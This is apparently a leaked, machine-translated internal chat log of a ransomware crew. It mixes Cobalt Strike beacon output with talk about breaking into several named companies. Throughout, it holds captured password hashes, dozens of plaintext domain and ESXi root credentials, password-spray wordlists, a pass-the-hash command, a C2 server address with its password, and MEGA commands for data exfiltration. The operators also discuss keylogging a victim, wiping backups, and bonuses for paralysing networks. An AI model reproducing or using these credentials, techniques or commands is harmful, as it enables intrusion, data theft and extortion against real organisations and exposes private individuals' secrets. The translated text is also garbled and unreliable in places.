``I think all 3 are free? Let's move onACADEMIC.NET no?[ ](https://mediaeveryone.com/channel/general?msg=yJF88nF88qByMt9Jd) Took LA\DA\Ea off, hell. I got the system up, but I can't get it to work in the coboo (80, 8080 ports with http lisener) and I opened 443 port and no session will come in ``History of my migration between domains
I opened a session with the rights `System` opened the list of processes and logged in to the administrator, took a list of hosts on the other domain and through the command `shell dir \\\[ip]\C$\Users` tried to determine where authorized was the DA, seeing that the list of directories is and filled dll through vmik run, at first (Friday) process runs but session did not come, today I tried again with re-criticized dll and session came, but then as usual hashdump + mimic and try to jump on the DC, all end, go away `SDFJ*H97yW*EFG7ysaEy9F*&sg8$ef84` update tulchanok, then work out so in work now?1 wait for us all came? i only change the names, logins will remain the old names i think this moment has comeDa[ ](https://mediaeveryone.com/channel/general?msg=yJF88nF88qByMt9Jd) what was it? port? and the network is also user3 me - ttps://lab.devry.edu/vpn/index.html
i tried to do it in the msf session (no cobu), i will try to move on with the second half of the day, i will give more net@user4 the first half of the day look for AV panel, search for technicians@user9 more specifics we have 3 networks in operation now in the sisd.k12 no approaches found. and in sisd.net if you don't take into account avers - everything seems to be readyTry new cresDetermine first what's done, what's being done, what's plannedWhat's the plan?
```
Administrator::.::F6F8AB934AB58AF9F64ABA9F742E52FB:0101000000000000003D92367296D60153E3AC54F3702C9F
00000000020016004400410054004100430045004E005400450052003200010016004400410054004100430045004E00540
0450052003200040016006400610074006100630065006E007400650072003200030016006400610074006100630065006E
00740065007200320007000800D8B23E357296D6010000000000000000
``a, okeyhash here)`` yes here it is, above. this is what invei caught the format what? overnight let's leave the brute and inveiprobruted with passwords from luiza, run invei - something caught, but hashtag does not take ....sploites want password from sa. now it's brute force already with rockyou wordrebrute whining and sploit? yes, in general, everything is as it was. how are things going here?
dimension::.::969615772484654CECA5175EAF959B4E:0101000000000000007193717096D601A59315971401D8FA0000
0000020016004400410054004100430045004E005400450052003200010016004400410054004100430045004E005400450
052003200040016006400610074006100630065006E007400650072003200030016006400610074006100630065006E0074
0065007200320007000800336BC76F7096D6010000000000000000

``````
[*] 10.20.4.0/24:445 - Scanned 256 of 256 hosts (100% complete)

``````
[*] 10.20.4.0/24:445 - Error: 10.20.4.34: RubySMB::Error::CommunicationError Read timeout expired when reading from the Socket (timeout=30)

``````IUSR_MATCHES01::.::39B6178D9AF43DD5120EC1A45969D0E0:0101000000000000003739696C96D60178CAE898183A8D5
800000000020016004400410054004100430045004E005400450052003200010016004400410054004100430045004E0054
00450052003200040016006400610074006100630065006E007400650072003200030016006400610074006100630065006
E007400650072003200070008001F77B0686C96D601000000000000000000000000```` I'll try DomainPasswordSpray to see if I can change something does not the domain itself can be polled? yes, but we are not in the domainIt pings the local domain available and send it once LDA requests as if you just register the domain in smbautobrute it does not cling to this domain?but domain users will not be collected so we can also look towards python utilities various times we have a context with the dedication is slow and does not collect domain users if there is visibility on the smb - then the best option here is probably smb_login module metasploitau us dedik not in the domain, and want to go through all networks domain with all domain users and the dictionary why? @tl2 Is there any password spray tool, which can manually specify the address ldap server?
User1-1 beacon> shell nslookup matchesfashion.com
[*] Tasked beacon to run: nslookup matchesfashion.com
[+] host called home, sent: 58 bytes
[+] received output:
Non-authoritative answer:

Server: UnKnown
Address: fdb0:64:3df8:0:7e4c:a5ff:fef9:c2a0

Name: matchesfashion.com.matches.com
Address: 204.74.99.100
``````
User1-1 beacon> shell arp -a
[*] Tasked beacon to run: arp -a
[+] host called home, sent: 37 bytes
[+] received output:

Interface: 192.168.0.80 --- 0xb
  Internet Address Physical Address Type
  192.168.0.1 7c-4c-a5-f9-c2-a0 dynamic
  192.168.0.15 a4-77-33-15-41-a0 dynamic
  192.168.0.255 ff-ff-ff-ff-ff-ff static
  224.0.0.2 01-00-5e-00-00-02 static
  224.0.0.22 01-00-5e-00-00-16 static
  224.0.0.251 01-00-5e-00-00-fb static
  224.0.0.252 01-00-5e-00-00-fc static
  224.0.0.253 01-00-5e-00-00-fd static
  239.255.255.250 01-00-5e-7f-ff-fa static
  255.255.255.255.255 ff-ff-ff-ff-ff-ff static
``````
FortiNet

User1-2 beacon> shell type setting.ini
[*] Tasked beacon to run: type setting.ini
[+] host called home, sent: 47 bytes
[+] received output:
[CONFIG]
CATEGORY=BROWSER;OFFICE;PDF;JAVA;MISC

[TRACK]
BROWSER=firefox.exe;chrome.exe;iexplore.exe;opera.exe;plugin-container.exe;opera_plugin_wrapper.exe;opera_plugin_wrapper_32.exe;FlashPlayerPlugin_*.exe
OFFICE=powerpnt.exe;winword.exe;excel.exe;EQNEDT32.exe
PDF=acrord32.exe;acrobat.exe;foxit reader.exe
JAVA=java.exe;javaw.exe;javaws.exe
MISC=helpctr.exe;hh.exe;wscript.exe;winhlp32.exe;loaddll.exe

[DANGEROUS]
BROWSER=wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
OFFICE=cmd.exe;wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
PDF=cmd.exe;wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
JAVA=wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
MISC=powershell.exe;net.exe;regsvr32.exe

[PROTECTION]
FLAGS=0

[REACTION]
MODE=0

[DESCRIPTIONS]
firefox.exe=Mozilla Firefox
chrome.exe=Google Chrome
iexplore.exe=Internet Explorer
opera.exe=Opera Internet Browser
plugin-container.exe=Plugin Container for Firefox
opera_plugin_wrapper.exe=Opera Internet Browser Plugin Wrapper
opera_plugin_wrapper_32.exe=Opera Internet Browser Plugin Wrapper (32 bit)
FlashPlayerPlugin_*.exe=Adobe Flash Player Plugin
powerpnt.exe=Microsoft PowerPoint
winword.exe=Microsoft Word
excel.exe=Microsoft Excel
acrord32.exe=Adobe Acrobat Reader
acrobat.exe=Adobe Acrobat
foxit reader.exe=Foxit Reader
java.exe=Java Platform SE
javaw.exe=Java Platform SE
javaws.exe=Java Web Start Launcher
helpctr.exe=Microsoft Help and Support Center
hh.exe=Microsoft HTML Help Executable
wscript.exe=Microsoft Windows Based Script Host
winhlp32.exe=Windows Help
loaddll.exe=LoadDll
cscript.exe=Microsoft Console Based Script Host
powershell.exe=Windows Powershell
net.exe=Windows Net Command
regsvr32.exe=Microsoft Register Server
cmd.exe=Windows Command Processor
dw20.exe=Microsoft Application Error Reporting
eqnedt32.exe=Microsoft Equation Editor
``````
User1-2 beacon> shell route print -4
[*] Tasked beacon to run: route print -4
[+] host called home, sent: 45 bytes
[+] received output:
===========================================================================
Interface List
 10...00 09 0f aa 00 01 ......Fortinet SSL VPN Virtual Ethernet Adapter
 14...00 68 eb 67 1a a2 ......Intel(R) Ethernet Connection (6) I219-V
 22...04 ed 33 e4 5f 2b ......Microsoft Wi-Fi Direct Virtual Adapter
  7...06 ed 33 e4 5f 2a ......Microsoft Wi-Fi Direct Virtual Adapter #2
 18...00 09 0f fe 00 01 ......Fortinet Virtual Ethernet Adapter (NDIS 6.30)
 11...04 ed 33 e4 5f 2a ......Intel(R) Wi-Fi 6 AX200 160MHz
  1...........................Software Loopback Interface 1
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
          0.0.0.0 0.0.0.0 192.168.0.1 192.168.0.80 50
        127.0.0.0.0 255.0.0 On-link 127.0.0.1 331
        127.0.0.1 255.255.255.255.255 On-link 127.0.0.1 331
  127.255.255.255.255.255.255.255 On-link 127.0.0.1 331
      192.168.0.0 255.255.255.0 On-link 192.168.0.80 306
     192.168.0.80 255.255.255.255.255 On-link 192.168.0.80 306
    192.168.0.255 255.255.255.255 On-link 192.168.0.80 306
        224.0.0.0.0 240.0.0.0 On-link 127.0.0.1 331
        224.0.0.0.0 240.0.0.0 On-link 192.168.0.80 306
  255.255.255.255.255.255.255.255 On-link 127.0.0.1 331
  255.255.255.255.255.255.255.255 On-link 192.168.0.80 306
===========================================================================
Persistent Routes:
  None
``````
User1-2 beacon> shell net share
[*] Tasked beacon to run: net share
[+] host called home, sent: 40 bytes
[+] received output:

Share name Resource Remark

-------------------------------------------------------------------------------
C$ C:\ Default share
IPC$ Remote IPC
ADMIN$ C:\windows Remote Admin
The command completed successfully.
The ``pinged sql-keys
```
AWS-VTBCSQL01.matches.com [10.7.19.25]
EC2AMAZ-U49LCLF.matches.com [10.1.4.4]
AWS-VTBIMSTRI03.matches.com [10.7.18.36]
``OK.'' Then I suggest the following:
- try to connect it to the wpn
- gather from ad_comps list all the mssql servers and try sa account or try to solidify the dedicata would be fun and turn on the vpn at this point also, how do you connect? well yesterday the keylogger showed that she went to netflix to see idletimea for example by timea how do you determine?so she didn't notice any abnormal activity. the important thing is to log in when she's not there. so the point is to log in to her pc under her access and enable yourself some wpn on some other machines. did you try to connect to the dc? did you try to get her in the remote dc group? adfind did not work. did you get it off with a turn-by-turn info? did you get it off on all the dc's?
```
M@tches2020!
M@tches2020!
M@tches2020
Matches2014
matches123
matches123!
matches123!!!
m@tches123
m@tches123!
m@tches123!!!
Matches123!
Matches123!
Matches123!!!
M@tches123
M@tches123!
M@tches123!
tried yesterday tried if she is asleep now you can go to her on the rdp and connect to the domain can try it on YES polzakov with a limit on the number of attemptsdid you get a dictionary for brute force in the process? and brute what? and her computer in the domaine pk also not in the domain as an option to try brutePo no information on the connection console6+she has a new version?she seems to connect when she needs access to network drives for the old version we know ... can you check if the user is not currently connected to the console version you do not know? we have a tunnel through the VPN to the subnet from where you can access the DC. But we can not do anything well from the fact that our computer is not in the domain. Plus the user is not an administrator. Inveeem also can not catch anything. In addition there are balls available to write. Yesterday we wanted to replace the labels in them, but not yet - not sure that the idea is good. In general, the situation so far stalemate. Maybe there is a solution, where to go in such a situation?
```
svc_egnyteelc
sccmadmin
svc_ntbackup
Jacquesv.adm
georger.adm
sev_eset
svc_becrypt
OktaService
Karlns.adm
eo.adm
svc_admonitor
MSSQLSvc
``We should have at least some kind of feedback on the networks, what is closed and what is not, so there would be no such situations, provided that now we know that for closed networks there are bonuses for 2 networks there were definitely bonuses, i remember it)))) we had a few bonuses after training and one before january, when asked what the bonus for - "for a good mood" i think i said that one was i was told that you had bonuses for closed nets + one second@tl1 please add me in `sccy.com` without fuck-ups so let's fuck up the quality, in the end everyone will be on the plus side, so do it from 1 time we do not do anything offline([ ](https://mediaeveryone.com/channel/general?msg=vEoyyyPTRZASh5wawE) not the fact that there was no offline backups all rolled back[ ](https://mediaeveryone.com/channel/general?msg=4XdGzRpcrmrzHu5tS) And if we finish with 2 times?well, let's just say that successfully = a no-fail network, completely paralyzedThe question of premiums until today will be solved today. now more motivated. today I personally vouch for the premiums on successfully closed nets, draw a line[ ](https://mediaeveryone.com/channel/general?msg=vhL4vfKYsfxCcf5aw) The answer is always the same! What I was given out I handed out[ ](https://mediaeveryone.com/channel/general?msg=LsgvAKoGPEi5SQnyN) the question to him, you are there amateur activity about which no one knows but you)[ ](https://mediaeveryone.com/channel/general?msg=eybcR4z8WdwBXQkBn) the Offices got it, we'll be more vigilant and make more effort, I hope our efforts will not go unnoticed or wait, I got 2 or 3 thousand that month more than others, but I spent at work and gasoline for 4)[ ](https://mediaeveryone.com/channel/general?msg=6BB4Mq2pKZ4QZTpoh) who promised? Let's say they promised me a prize for the forum, I fucked 3 days off doing the forum. i got nothingwhen there should be at least 2 let's say even 1 so is 1 prize a reason to say that they have? about bonuses the question is open i also remember it, but @user3 maybe not thim lidovna but you who did not congratulate?) the new year was not even congratulated before january recently have not fucking closed if i'm right probably will come to you now specify about bonuses or we fucking have not closed?Where are they? What bonuses? Seriously? This is the first time we've heard, I honestly don't understand. you get bonuses for successfully closed networks. don't you need them? hello there, what are we working on? good nightbz tomorrow by 4 more hour work in #ballymoregroup-com turned off the VPN, it was not found, other machines could not get
then helped in #sccy-com jumped on the cars, where they sit guys who in theory go to the nas - deaf, the creeds from them in the search.
Username : dcha
Domain : RTPCO
Password : 11Saundra
``ESXi outside domains
```
Name :
esxicrockett1.us.alloypolymers.com
esxicrockett2.us.alloypolymers.com
esxifrance1.rtpco.local
esxifrance2.rtpco.local
esxihend1.rtpco.local
esxiindy1.rtpco.local
esxiindy2.rtpco.local
esximanage.rtpco.local
esximanage2.rtpco.local
esximexico2.rtpco.local
esximn1.rtpco.local
esximn2.rtpco.local
esximn3.rtpco.local
esximn4.rtpco.local
esximn5.rtpco.local
esximnrp1.rtpco.local
esximnrp2.rtpco.local
esxiohio1.rtpco.local
esxiohio2.rtpco.local
esxiorange1.us.alloypolymers.com
esxiorange2.us.alloypolymers.com
esxipoland1.rtpco.local
esxipoland2.rtpco.local
esxiredwing1.rtpco.local
esxiredwing2.rtpco.local
esxisg1.rtpco.local
esxisg2.rtpco.local
esxishenzhen1.rtpco.local
esxishenzhen2.rtpco.local
esxisuzhou1.rtpco.local
esxisuzhou2.rtpco.local
esxitexas1.rtpco.local
esxitexas2.rtpco.local
esxiva1.rtpco.local
esxiva2.rtpco.local

```
And creeds for them
```
Username : root
Password : dropCod5
``````
Username : bstangea
Domain : RTPCO
Password : pL@yTyme!

Username : AXSQLSERVC
Domain : WINONA
Password : gg5bvq

Username : tmusta
Domain : RTPCO
Password : 27Singapore

Username : cwwestby
Domain : RTPCO
Password : Plastics16

Username : marcom
Domain : RTPCO
Password : Rtp5802023!

Username : jesmith
Domain : RTPCO
Password : Nascar1020

Username : jmierau
Domain : RTPCO
Password : 3Brian4Becky

Username : corr
Domain : RTPCO
Password : 00sthomas,

Username : pvcimpro
Domain : RTPCO
Password : 4qbuyh

Username : dpflughoeft
Domain : RTPCO
Password : BabyYoda123

Username : mmohr
Domain : RTPCO
Password : Welcome123

Username : AxAdmin
Domain : RTPCO
Password : gg5bvq

Username : WINONA\Administrator
Domain : WINONA\Administrator
Password : DA7PaM8h

Username : lmiller
Domain : RTPCO
Password : 2101Ronnie
``rtp
```
>memberOf : CN=VEEAMAdmins

bbuerck
 ```
```
>memberOf: CN=VEEAMUsers

dch
wstange
 ```
```
>sAMAccountName: veeam_service
>sAMAccountName: vmbackup
``.Passed in both trusts (in alloy to server, in winona to dk)
```
pth rtpco\vmbackup 2212f99d3c73ac885850545c544072af
```

YES to alloy.
```
	 * Username : wstangea
	 * Domain : ALLOY
	 * NTLM : 652805d304727fa73d6c4c7cfef31986
 
	 * Username : wstangea
	 * Domain : us.alloypolymers.com
	 * Password : Calib3r9
```
```
	 * Username : Administrator
	 * Domain : ALLOY
	 * NTLM : 66ac9a770e02cfdded6d5bd957a774fb
``alloy:
```
>dNSHostName : AlloyVM01.us.alloypolymers.com
>operatingSystem: Windows Server 2003
 
Ping request could not find host AlloyVM01.us.alloypolymers.com. Please check the name and try again.
```
 


rtpco:
```
>operatingSystem: Windows Server 2012 R2 Standard
>dNSHostName: HendVeeam.rtpco.local
 
Ping statistics for 10.25.0.21:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>operatingSystem: Windows Server 2008 R2 Standard
>dNSHostName: OHIOVEEAM.rtpco.local
 
Destination host unreachable.
 
Ping statistics for 10.1.10.9:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>operatingSystem: Windows Server 2012 R2 Standard
>dNSHostName: INVeeam.rtpco.local
 
Destination host unreachable.
 
Ping statistics for 10.59.0.21:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: test-bs-vm.rtpco.local
>operatingSystem: Windows Server 2019 Standard
 
Ping statistics for 10.89.11.19:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>operatingSystem: Windows Server 2016 Standard
>dNSHostName: nevadahypv1.rtpco.local
 
Ping statistics for 10.57.2.233:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: Kaseya.rtpco.local
>operatingSystem: Windows Server 2016 Datacenter
 
Ping statistics for 10.89.11.24:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
 


 
winona:
```
>dNSHostName: Orion5.winona.rtpco.local
>operatingSystem: Windows Server 2003
>memberOf: CN=Storage2_SQLBackups_RW
 
Ping statistics for 89.0.191.194:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: AXDEV10.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Datacenter
>memberOf: CN=Storage2_SQLBackups_RW
 
Ping statistics for 10.89.0.61:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
```
```
>dNSHostName: AXSQL-TRN.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Standard
>memberOf: CN=Storage2_SQLBackups_RW
 
Ping statistics for 10.89.0.52:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: SuperOnContact.winona.rtpco.local
>operatingSystem: Windows Server� 2008 Standard
>memberOf: CN=Storage2_SQLBackups_RW
 
Ping statistics for 89.0.0.33:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: AXSQL-PROD-OLD.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Enterprise
>memberOf: CN=Storage2_SQLBackups_RW
 
Ping statistics for 10.89.0.200:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: SQLSRV1.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Standard
>memberOf: CN=Storage2_SQLBackups_RW
 
Ping statistics for 89.0.0.121:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: vmwaremgr.winona.rtpco.local
>operatingSystem: unknown
 
Destination host unreachable.
 
Ping statistics for 89.0.55.9:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
```
```
>dNSHostName: CitrixVM6.winona.rtpco.local
>operatingSystem: Windows Server 2012 R2 Datacenter
 
Ping statistics for 10.89.0.155:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: CitrixVM5.winona.rtpco.local
>operatingSystem: Windows Server 2012 R2 Datacenter
 
Ping statistics for 10.89.0.154:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: CitrixVM4.winona.rtpco.local
>operatingSystem: Windows Server 2012 R2 Datacenter
 
Ping statistics for 10.89.0.153:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: historianvm.winona.rtpco.local
>operatingSystem: Windows Server 2003
 
Ping statistics for 89.0.192.96:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: CITRIXVM1.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Standard
 
Ping statistics for 10.89.0.150:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: CITRIXVM2.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Standard
 
Ping statistics for 10.89.0.151:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: CITRIXVM3.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Standard
 
Ping statistics for 10.89.0.152:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: CITRIXVMONC2.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Datacenter
 
Ping statistics for 10.89.0.161:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: CITRIXVMONC1.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Datacenter
 
Ping statistics for 10.89.0.160:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
``````
https://vmwaremgr.winona.rtpco.local
https://vc1.rtpco.local/websso/SAML2/SSO/vsphere.local

 Name : Barracuda Orange Backup Server
	URL : http://10.1.8.14/auth/signin/

	Name : Barracuda Crockett Backup Server
	URL : http://10.1.5.44/auth/signin/
    
	Name : Barracuda Crockett Backup Server
	URL : http://10.1.5.34/auth/signin/

	Name : Barracuda Backup RCH
	URL : http://10.1.1.14/auth/signin/
    
	Name : ORG Barracuda Networks Login
	URL : http://10.1.8.232/web/login?_bcsp=1&_bceq=U2FsdGVkX1_ZQKJqbA-A6J1pDS0v348lRBF4gQRaT1Oos5iW-joM_MbMEGYcdA1LafroouYOUK8fDhjDdsOT4mCUAGvUboqz-KCiF9iyFEw.

	Name : CRT Barracuda Networks Login
	URL : http://10.1.5.180/web/login?_bcsp=1&_bceq=U2FsdGVkX1-zFQuAcSM8y3KXKFNCE-epeWxGww7gw37-3-IbBQlsFBC_6dk77rKf2OplTxoJjBY2xSAtaA0JEgq7yd9tbiBEUiNt-wZbBYo.


89.0.10.104:445 (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP
````GAPROC (null)````
List of domain trusts:

    0: GAPROC (null) (Direct Outbound) (Direct Inbound)
    1: RTPCO rtpco.local (Direct Outbound) (Direct Inbound)
    2: ALLOY us.alloypolymers.com (Forest tree root) (Primary Domain) (Native)
``````
alloy\Administrator 66ac9a770e02cfdded6d5bd957a774fb
``willdaydaydanu what would not be deleted 50 normal ? if your coba not deleted them usually 300 + how much slipsoe goodnight clean files before tomorrow slipsoe tomorrow as usual then finish for today joined user1, throw in the confab + I help those who do not have sessions help those who have them write me to конфу@tl1HN.LOCAL
Pomayu alexandruokne, still throw me a session in the slipstream may have a file with authorization or with the creed, maybe lucky you what do you mean by configs citrix?then you go out now looking for citrix configsx apparently yes@tl1 i think the machine is not in the domain at all+@tl1 i have a session hung up i took myself INTUNETEST, the domain does not show, as i gather the info i will write you.com those who do not have their networking confab write domains+will have something to work with if they fall off, if there are not taken - take away +++ all taken?losalna write the domains to make the confu da, starta I do not I do not I have no immediately do myself a spawn wait I have not + took one secws2 so far what 3 disassembled? yesok rephrase, where to turn off plugins? or you mean cna modules? it turns out only 3 sessions as an option turn off all plugins and then turn on one by one, do not bother yet@tl1 In the other hang open where can I check it?although there has been a minute timeout someone of you is a plugin that deletes "inactive" sessionsа where they disappear where have they gone? Where have sessions leftcreate a confab when your session reaches the coba check that arrives, if AV lab simply user1-9 without group binding * come in, choose a session, make a spawn in your coba, in the comment to the session, write what user took, I do confabobshak?
107.161.123.170:50050 DCYZLqYmoVxQj2ITcxQ8rXA5zkAttl
``Where are the objects while you have time to remember yesterday's material@tl1 We have datacenter2 so on rdp and won't let you in... Reboot it or something.
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
``````
beacon> shell ping BOBXPS.waterway.com
[*] Tasked beacon to run: ping BOBXPS.waterway.com
[+] host called home, sent: 55 bytes
[+] received output:
Pinging BOBXPS.waterway.com [192.168.0.18] with 32 bytes of data:
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
Ping statistics for 192.168.0.18:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
 
beacon> shell ping BobsLaptop.waterway.com
[*] Tasked beacon to run: ping BobsLaptop.waterway.com
[+] host called home, sent: 59 bytes
[+] received output:
Pinging BobsLaptop.waterway.com [192.168.90.3] with 32 bytes of data:
Reply from 192.168.90.3: bytes=32 time=138ms TTL=127
Reply from 192.168.90.3: bytes=32 time=59ms TTL=127
Reply from 192.168.90.3: bytes=32 time=149ms TTL=127
Reply from 192.168.90.3: bytes=32 time=63ms TTL=127
Ping statistics for 192.168.90.3:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 59ms, Maximum = 149ms, Average = 102ms
```
```
beacon> shell dir \\192.168.90.3\D$
[*] Tasked beacon to run: dir \192.168.90.3\D$
[+] host called home, sent: 52 bytes
[+] received output:
The network path was not found.
 
beacon> shell dir \\192.168.0.18\C$
[*] Tasked beacon to run: dir \\192.168.0.18\C$
[+] host called home, sent: 52 bytes
[+] received output:
The network path was not found.
```
```
beacon> shell wmic /node:192.168.90.3 logicaldisk get description,name
[*] Tasked beacon to run: wmic /node:192.168.90.3 logicaldisk get description,name
[+] host called home, sent: 87 bytes
[+] received output:
Node - 192.168.90.3
ERROR:
Description = The RPC server is unavailable.
 
beacon> shell wmic /node:192.168.0.18 logicaldisk get description,name
[*] Tasked beacon to run: wmic /node:192.168.0.18 logicaldisk get description,name
[+] host called home, sent: 87 bytes
[+] received output:
Node - 192.168.0.18
ERROR:
Description = The RPC server is unavailable.
``I wanted to clarify it tooBobsLaptopBOBXPS(
```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe Bob Administrator 1853Gators
[*] Tasked beacon to run .NET program: SharpSniper.exe Bob Administrator 1853Gators
[+] host called home, sent: 113763 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.
In fact, only he left>name: Bob Dubinsky from here `CN=IT `let's look into the other technareim I think they made for their admins left-handed users.So they wrote that have tried all the YES with and without the domain and with different variations of passwords) geez, we should try nimblewhere?there everything is clean there i checked the centers and vmvar was not seen except for the link in the browser in the doc that i threw a long time ago showed the settings nimbles are associated with hypervisors no or vmvarevcentronu and what virtualization center are you talking about?)hypervisor)is that even what? on the one I threw vmvare - empty there can be access to the disk with snapshots from nimble nimble have the ability to integrate into such things blauer you do not have go to the center of virualization there is such on the techs?
https://infosight.hpe.com/InfoSight/media/cms/active/public/pubs_Windows_Integration_Guide_NWT_5_0_0.whz/wmt1480648506910.html
``just in case i also tried root:root have you triedadmin:admin?
```
>operatingSystem: Hyper-V Server
``there's only something like this
```
>description: Failover cluster virtual network name account
```
```
>servicePrincipalName: Microsoft Virtual System Migration Service/WWHV01
>servicePrincipalName: Microsoft Virtual System Migration Service/WWHV01.waterway.com
>servicePrincipalName: Microsoft Virtual Console Service/WWHV01
>servicePrincipalName: Microsoft Virtual Console Service/WWHV01.waterway.com
>servicePrincipalName: Microsoft Virtual Console Service/WWHV01 waterway.
URL : https://store.vmware.com/store/
Username : mharper@waterway.com
Password : 1Vanilla2
```
there is such you have found in vcenter? on request goyya in slack found only access on wwsql-messages much and searches dolnoosch to push? at mail on Root and with different variations of clears that found already and with @ and through slash tried[ ](https://mediaeveryone.com/group/waterway-com?msg=q9dxQCkFZ5u9xASRH) them it seems the first checkA with domains on nimbel do not roll?)ah, well there empty I just see that in the dashboard are also esks, you can not look :) what? esksynu did not anything interesting? then check the rest of the grouppusto there in ncentral is a group eskha suddenly too fast beacon?) nothing there beaconednu and screenshots along the way did I do so
```
shell start /b MEGAcmdServer.exe
shell MEGAclient.exe login
``[ ](https://mediaeveryone.com/group/waterway-com?msg=MaLx72xmqbWiJ5J58) just now saw) no. not so. through execute192.168.0.254 and then in the psentrall let's run with the domains their passwords with root what is thereDid everyone try the admin account?[ ](https://mediaeveryone.com/group/waterway-com?msg=QC5rcecgmouaadQh7) -tied!!!yes, binding to the domain and you should specify the domain or Rootmb domain?or take their mailboxes and delete the message about successful authorization from all of us wait until they leavetwo variatudes, already found the creeds[ ](https://mediaeveryone.com/group/waterway-com?msg=gqZeK3Fm7KJkoQg4H).okeytak more beautifula what is it for? `WATERWAY\djarden MyNewPassword6 ``why I concluded that it is local andpakot where I throw the sock gets to vvdk2 and when you connect there by rds dedik` ``
C:\Users\Administrator>ping -n 1 127.0.1.1

Pinging 127.0.1.1 with 32 bytes of data:
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.1.1:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
``with dk2''.
beacon> shell ping -a -n 1 127.0.1.1
[*] Tasked beacon to run: ping -a -n 1 127.0.1.1
[+] host called home, sent: 53 bytes
[+] received output:

Pinging 127.0.1.1 with 32 bytes of data:
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.1.1:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

```+
```
	 * Username : djarden
	 * Domain : WATERWAY
	 * Password : MyNewPassword6
``Yes, that's why there's no union on any host under creeds``.
	 * Username : djarden@waterway.com
	 * Domain : (null)
	 * Password : DJarden6
``````
	msv :
	 [00000003] Primary
	 * Username : djarden
	 * Domain : WATERWAY
	 * NTLM : 8c7ce287451c3bbd94b08733f0d4f8d7
	 * SHA1 : d5ee0ca5701d49cd73ffe72244bc481fbecf29e6
	 * DPAPI : 8b55a307cd3193b311053ee63498ecda
	tspkg :
	 * Username : djarden
	 * Domain : WATERWAY
	 * Password : MyNewPassword6
``logon from winlogon request or browser history if not, then logonpasswordsdetermine hash first check it win10? is there a session there? do I have a netego clear pass?[ ](https://mediaeveryone.com/group/waterway-com?msg=ktF5emnAqvxCPLyA7) relatively fresh...[ ](https://mediaeveryone.com/group/waterway-com?msg=6fjrvSMLTyH4ABN4i) on ip 127....04/25/2019 09:51:35 AMDate of message?check your mail...and it's mostly requests for changeover password 200+ results[ ](https://mediaeveryone.com/group/waterway-com?msg=nWZSfPGBEWbrKpQGC) here's tacoenu useless info there[ ](https://mediaeveryone.com/group/waterway-com?msg=YJ8DGBmfEcKZKN9TA) 1there's mostly tacoenu by nimble did you search only by ip?
beacon> shell ping -a 192.168.0.75
[*] Tasked beacon to run: ping -a 192.168.0.75
[+] host called home, sent: 51 bytes
[+] received output:

Pinging nimble-group1.waterway.com [192.168.0.75] with 32 bytes of data:
Reply from 192.168.0.75: bytes=32 time<1ms TTL=64
Reply from 192.168.0.75: bytes=32 time<1ms TTL=64
Reply from 192.168.0.75: bytes=32 time<1ms TTL=64
Reply from 192.168.0.75: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.0.75:
